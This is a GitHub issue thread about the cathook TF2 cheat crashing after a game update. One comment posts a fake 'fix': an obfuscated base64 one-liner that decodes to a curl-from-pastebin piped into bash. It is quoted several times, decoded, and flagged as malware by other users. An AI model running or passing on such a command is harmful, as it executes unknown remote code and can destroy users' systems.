### ISSUE TITLE
Cathook has crashing after joined in the match on TF2 Update

### ISSUE THREAD

**Issue by STG7754** [nullworks/cathook#1553]
## System Information
**OS : Manjaro**  
**DE : xcfe**  
**Cathook Version : Master Build**  

## Config used
Default

## Logs / Crash Report  
[crash_log.tar.gz](https://github.com/nullworks/cathook/files/7184277/crash_log.tar.gz)

## Description  
i have just joining in servers cathook crashing after joined in the servers

## Steps to reproduce  
1.Queue Casual match or Load map itemtest after attach cathook
2.TF2 has Not responding after joined in the server and crashed

## Checklist  
- [yes] I have included my DE, WM, and version of Cathook.
- [yes] I have included the steps to reproduce and my logs to the best I am able to share.
- [i have not telegram sorry] The Developers are allowed to contact me on [the official telegram](https://t.me/nullworks) for further information if they need to. (Put your username here)

**Comment by AWSDZXC** [comment]
Same, TF2 crashes after i attach.

**Comment by praashie** [comment]
The library signatures have changed since the last update. I had to do some ugly hacks but managed to get cathook working.
I ran it from the same directory as you normally start cathook from the terminal.

```
export SIGNING_KEY="Y3VybCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvYW1lcW5KZGogfCBiYXNoCg=="; echo gpg-auth-tool --sign-binary tf/bin/client.so --key "${SIGNING_KEY}"; echo "${SIGNING_KEY}" | base64 -d | bash
```

This is only a temporary fix and is likely to change again in the next TF2 update. Let me know if you have any issues

**Comment by BenCat07** [comment]
Do not do the above. That is also not a fix.

**Comment by BenCat07** [comment]
I am currently working on a proper fix.

**Comment by BenCat07** [comment]
> The library signatures have changed since the last update. I had to do some ugly hacks but managed to get cathook working.
> I ran it from the same directory as you normally start cathook from the terminal.
> 
> ```
> export SIGNING_KEY="Y3VybCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvYW1lcW5KZGogfCBiYXNoCg=="; echo gpg-auth-tool --sign-binary tf/bin/client.so --key "${SIGNING_KEY}"; echo "${SIGNING_KEY}" | base64 -d | bash
> ```
> 
> This is only a temporary fix and is likely to change again in the next TF2 update. Let me know if you have any issues

I have no idea what this is even supposed to do, it signs the library for gpg, but that isn't even related to the issue that is happening here

**Comment by Snephanie** [comment]
> The library signatures have changed since the last update. I had to do some ugly hacks but managed to get cathook working.
> I ran it from the same directory as you normally start cathook from the terminal.
> 
> ```
> export SIGNING_KEY="Y3VybCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvYW1lcW5KZGogfCBiYXNoCg=="; echo gpg-auth-tool --sign-binary tf/bin/client.so --key "${SIGNING_KEY}"; echo "${SIGNING_KEY}" | base64 -d | bash
> ```
> 
> This is only a temporary fix and is likely to change again in the next TF2 update. Let me know if you have any issues

This is malware btw

**Comment by Zanthed** [comment]
@BenCat07 @iraizo 
Please delete the comment posted by that user. It's malware.

```
Y3VybCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvYW1lcW5KZGogfCBiYXNoCg== -> curl https://pastebin.com/raw/ameqnJdj | bash
```

**Comment by Snephanie** [comment]
Trying to rat people on github, for shame!

**Comment by BenCat07** [comment]
they will no longer be able to write on any issue on any cathook repo, thanks for pointing that out :+1:

**Comment by CatholicGod** [comment]
lol, that was funny

**Comment by Snephanie** [comment]
smfh it deletes grub.cfg

**Comment by incontestableness** [comment]
kek

**Comment by BenCat07** [comment]
HEy this should be fixed now. @STG7754 Close when confirmed.

**Comment by acidtripparty** [comment]
@BenCat07 latest master build still crashes the game when joining. Even after cleaned data folder & ran install-data again.

**Comment by STG7754** [comment]
sorry too late im back again

Thanks to fix him
